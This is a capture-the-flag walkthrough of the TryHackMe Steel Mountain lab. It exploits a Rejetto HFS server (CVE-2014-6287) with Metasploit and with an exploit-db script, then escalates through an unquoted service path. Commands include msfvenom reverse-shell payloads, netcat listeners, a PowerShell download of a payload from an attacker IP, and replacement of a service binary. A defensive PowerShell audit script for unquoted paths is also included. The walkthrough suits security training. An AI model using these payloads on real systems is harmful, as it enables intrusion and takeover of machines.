TryHackMe: Steel Mountain
[Task 1] Introduction
- Deploy the machine. Who is the employee of the month?
Let's scan the ports
nmap -Pn <ip>

Scan services and OS
nmap -sV -O <ip>


There are 6 open ports and services. The OS is Windows Server 2008 R2 - 2012.
Let's access port 80
http://<ip>
Inspect the resources, source code, and network tab. Now we have the employee of the month.

Fuzz directories using DirBuster

DirBuster's result. I tried to access these files and directories, but I couldn't.

Let's scan for vulnerabilities
nmap --script vuln <ip>
The script reports vulnerabilities:
port 80 -> http-vuln-cve2015-1635
port 8080 -> http-vuln-cve2011-3192
There are SMB ports open. Let's scan them with nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
Nothing in the scan result.

[Task 2] Initial Access
1. Scan the machine with nmap. What is the other port running a web server on?
ANS: 8080
2. Take a look at the other web server. What file server is running?
Access the website
http://<ip>:8080
Inspect the site, nothing so far.

Click on Server Information

It’s HTTP File Server from Rejetto.

Let's fuzz directories with DirBuster.

The result is empty.

3. What is the CVE number to exploit this file server?
Go to exploit-db.com
https://www.exploit-db.com/
Search for rejetto and click the first result


4. Use Metasploit to get an initial shell. What is the user flag?
msfconsole
search 2014-6287

use 0
show options

set RHOSTS <target ip>
set RPORT 8080
run

getsystem
migrate
It failed.

cd /Users
ls

cd bill
ls

cd Desktop
ls

cat user.txt

[Task 3] Privilege Escalation
- Upload the PowerUp script
upload <path>

ls

load powershell
powershell_shell

. .\PowerUp.ps1
Invoke-AllChecks

2. Take close attention to the CanRestart option that is set to true. What is the name of the unquoted service path service name?

3. The CanRestart option being true allows us to restart a service on the system, and the directory of the application is also writable. This means we can replace the legitimate application with our malicious one and restart the service, which will run our infected program!
Let’s note the path first
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
Use msfvenom to generate a reverse shell as a Windows executable.
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe

Back in Metasploit, create the listener
use multi/handler
set LHOST <attacker ip>
set LPORT <attacker port>

Back to my old session, in my case it’s #3
sessions 3

Upload our payload
upload /root/Desktop/ASCService.exe
Stop the service
shell
sc stop AdvancedSystemCareService9

Copy the file over the original binary
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

Start the service, which now runs our payload
sc start AdvancedSystemCareService9
Now I only have 30 seconds to migrate to an admin process; if I waste time the session will die and I have to redo the steps again.
For me, it took about 5 attempts until I got the shell.
List processes
ps
Migrate to lsass.exe. In my case its PID is 648
migrate 648
getsystem

cd /Users/Administrator/Desktop
ls
cat root.txt
[Task 4] Access and Escalation Without Metasploit
- Save script from https://www.exploit-db.com/exploits/39161

Edit the local IP and port in the script


Start an HTTP server
python -m SimpleHTTPServer 80

Create a listener
nc -lvp 4444

Run the exploit
python rejetto.py <ip> 8080

Let's look at the HTTP server log

Rename ncat.exe to nc.exe
mv ncat.exe nc.exe

Run the python command again
python rejetto.py <ip> 8080

Back at the listener, now I have a shell

2. Check the system version
systeminfo

Get winPEAS
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://<attacker ip>/winPEAS.exe"

Verify the file
dir

Run winPEAS.exe
winPEAS.exe

Note the unquoted path
AdvancedSystemCareService9
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
To list services manually
powershell -c "Get-Service"

ANS: powershell -c "Get-Service"
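The unquoted service path that PowerUp and winPEAS flag above can be audited without either tool. The following PowerShell is an added example, not part of the original walkthrough or of those tools: it lists every service whose binary path is unquoted and contains spaces, works out the intermediate `<prefix>.exe` locations the service control manager would try first, and reports which of those directories grant write access to low-privileged groups (the group names checked are an assumption for a default English Windows install).

```powershell
function Test-LowPrivWritable {
    # True if Everyone/Users/Authenticated Users can create files in $Dir
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir)) { return $false }
    $lowPriv = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'
    foreach ($ace in (Get-Acl -LiteralPath $Dir).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        # Any right that lets a non-admin drop a file into the directory
        if ($ace.FileSystemRights -match 'Write|Modify|FullControl|CreateFiles') {
            return $true
        }
    }
    return $false
}

function Get-UnquotedServicePath {
    # Win32_Service.PathName is the ImagePath exactly as stored in the registry
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        # Quoted paths are parsed as a single token and are not affected
        if (-not $path -or $path.StartsWith('"')) { return }
        # Keep the executable portion, drop any service arguments after ".exe"
        if ($path -notmatch '^(?<exe>.*?\.exe)') { return }
        $exe = $Matches['exe']
        if ($exe -notmatch ' ') { return }

        # At each space the loader first tries "<everything before it>.exe",
        # e.g. C:\Program.exe, then C:\Program Files.exe, and so on
        $tokens = $exe -split ' '
        $candidates = for ($i = 1; $i -lt $tokens.Count; $i++) {
            ($tokens[0..($i - 1)] -join ' ') + '.exe'
        }
        $dirs = $candidates | ForEach-Object { Split-Path $_ -Parent } | Sort-Object -Unique
        [pscustomobject]@{
            Name         = $_.Name
            RunsAs       = $_.StartName
            ImagePath    = $path
            Candidates   = $candidates
            WritableDirs = @($dirs | Where-Object { Test-LowPrivWritable $_ })
        }
    }
}

# Only services where a low-privileged user could actually plant a binary
Get-UnquotedServicePath | Where-Object { $_.WritableDirs.Count -gt 0 } | Format-List
```

Run from an elevated prompt so every service's ACLs can be read; a service that shows up here with RunsAs LocalSystem is the exact condition the walkthrough exploits. The fix is to quote the ImagePath (`sc.exe config <service> binPath= "\"C:\full path\service.exe\""`) and remove write access for non-admin principals from the directories listed.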
4. Exploitation
Go to the path
cd \Program Files (x86)\IObit\Advanced SystemCare
Back on the attacker's machine, create the msfvenom payload
Reference: https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1234 -f exe -o ASCService.exe

Create listener on port 1234
nc -lvp 1234

Back on the victim's machine, stop the service
sc stop AdvancedSystemCareService9

Back up ASCService.exe
rename ASCService.exe ASCService_bak.exe

Download our payload
powershell -c "Invoke-WebRequest -OutFile ASCService.exe http://10.8.3.50/ASCService.exe"

Start the service
sc start AdvancedSystemCareService9
Now I have a shell.
